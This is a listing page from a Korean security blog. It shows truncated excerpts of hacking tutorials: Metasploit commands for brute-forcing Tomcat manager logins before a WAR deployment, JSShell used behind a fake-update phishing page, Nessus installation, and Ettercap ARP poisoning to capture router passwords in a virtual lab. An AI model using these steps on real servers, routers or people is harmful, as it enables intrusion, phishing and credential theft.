3. 웹 애플리케이션 취약점 진단137 Apache Tomcat 관리자 페이지 취약점 악용 - Metasploit 톰캣에서 [서버주소]:[서버포트]/manager/html 로 접속하게 되면 관리자 페이지 로그인 아이디와 비밀번호 입력 알림창이 뜬다. 이 상태에서 칼리에서 msfconsole을 틀어준다. >service postgresql start >msfconsole >search tomcat >use auxiliary/scanner/http/tomcat_mgr_login - mgr, 즉 매니저 로그인 취약점을 통해 아이디 비번을 알아낸다. >show options >set rhosts [서버아이피] >set rport [서버포트] >exploit 익스플로잇 후 성공한 목록의 아이디 비밀번호로 접속한다. 그 후 WAR file to deploy 탭을 활용한 취약점 해킹을 시도한다. >back >clear >sear.. 2023. 12. 28. JS Shell 자바스크립트 [웹 기반 자바스크립트 셸] https://github.com/Den1al/JSShell GitHub - Den1al/JSShell: An interactive multi-user web JS shell An interactive multi-user web JS shell. Contribute to Den1al/JSShell development by creating an account on GitHub. github.com [설치법] cd JSShell pip install -r requirements.txt 나머지 설치법은 길어서 github의 installtion 참조 [피싱페이지를 활용한 사용법] 피싱사이트를 그럴싸하게 하기 위해 가짜 업데이트 템플릿 사이트에 가서 해당 index.html 소스코드를 복사한 후 html 파일.. 2023. 12. 28. 취약점 분석 도구 nessus 설치법 https://www.tenable.com/downloads/nessus?loginAttempted=true Download Tenable Nessus Download Nessus and Nessus Manager www.tenable.com 위 사이트로 가시면 nessus의 여러 운영체제 버전들이 나오게 됩니다. 칼리리눅스는 아래로 가다보면 debian 버전이 있을겁니다. 칼리리눅스의 x32 x64 버전에 맞춰서 다운로드 합니다. 그리고 activation code가 필요한데 다운로드 사이트 맨위에 get activaton code가 있습니다. 접속 후 오른쪽 register 버튼을 클릭하여 가입 하면 이메일로 코드가 날라옵니다. 이걸 저장해 둡니다. 설치시 칼리리눅스 터미널에서 다운받은 deb 파.. 2023. 12. 28. Ettercap으로 공유기 계정 해킹 상황은 피해자와 공유기 주소 등 컴퓨터에 arp poisoning으로 감염시켜 중간자 공격 수행 후 피해자 컴퓨터에서 공유기 주소에 접속해서 공유기 계정에 로그인 시(iptime 같은 공유기) 해당 계정이 중간자로써 보이게 되는 구조입니다. 우선 virtual box에서 윈도우 7같은 가상 피해자 컴퓨터를 같은 네트워크에 틀어둡니다. [명령어 및 사용법] >ettercap -G : GUI 버전으로 에더캡을 실행 >eth0으로 맞추고 위의 체크박스 클릭 >왼쪽 위 돋보기 모양[scan for hosts] 클릭 >돋보기 옆에 버튼[host list] 클릭 >칼리리눅스 터미널 열고 route -n 으로 알아낸 게이트웨이 아이피 주소를 보고 host list에 해당 아이피를 add to target 1 >나머지.. 2023. 12. 28. 이전 1 2 3 4 5 6 7 ··· 35 다음